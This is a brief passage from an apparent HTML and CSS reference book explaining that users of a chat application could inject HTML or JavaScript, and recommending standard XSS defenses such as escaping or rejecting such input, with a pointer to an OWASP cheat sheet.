HTML and CSS Reference
In-Depth Information
Although the image transmission is not at all bad during a chat application, the user
sent the image by injecting HTML code. In a similar way, somebody could execute
JavaScript code and harm the conversation.
What can we do? Taking into consideration the old rules about XSS attacks still
works and is the best practice. Things you can do are checking your code for HTML
entities or JavaScript syntax, and replacing them with the appropriate representation
or simply rejecting them.
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet contains a lot
more information if you want to learn every aspect of XSS attacks, and how to avoid
them.
Search WWH ::




Custom Search